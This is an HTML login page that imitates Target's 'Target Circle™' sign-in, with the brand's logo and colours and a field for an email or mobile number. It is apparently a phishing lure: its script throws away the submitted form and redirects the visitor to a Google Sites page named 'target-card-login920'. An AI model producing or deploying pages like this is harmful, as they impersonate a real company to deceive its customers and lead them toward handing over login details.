
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Target Circle™ Login</title>
  <style>
    body {
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
      background-color: #f7f7f7;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }
    .container {
      background-color: white;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 0 15px rgba(0, 0, 0, 0.1);
      width: 100%;
      max-width: 400px;
    }
    h2 {
      text-align: center;
      color: #cc0000;
    }
    label {
      font-weight: bold;
      display: block;
      margin-bottom: 8px;
    }
    input[type="text"] {
      width: 100%;
      padding: 12px;
      margin-bottom: 20px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    input[type="submit"] {
      width: 100%;
      background-color: #cc0000;
      color: white;
      border: none;
      padding: 12px;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #a00000;
    }
    .logo {
      display: block;
      margin: 0 auto 20px auto;
      width: 80px;
    }
  </style>
</head>
<body>
  <div class="container">
    <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/9/9a/Target_logo.svg" alt="Target Logo" />
    <h2>Target Circle™ Login</h2>
    <form id="loginForm">
      <label for="email">Email or Mobile Number</label>
      <input type="text" id="email" name="email" placeholder="Enter your email or mobile" required />
      <input type="submit" value="Login" />
    </form>
  </div>

  <script>
    document.getElementById("loginForm").addEventListener("submit", function (e) {
      e.preventDefault();
      window.location.href = "https://sites.google.com/view/target-card-login920/home";
    });
  </script>
</body>
</html>
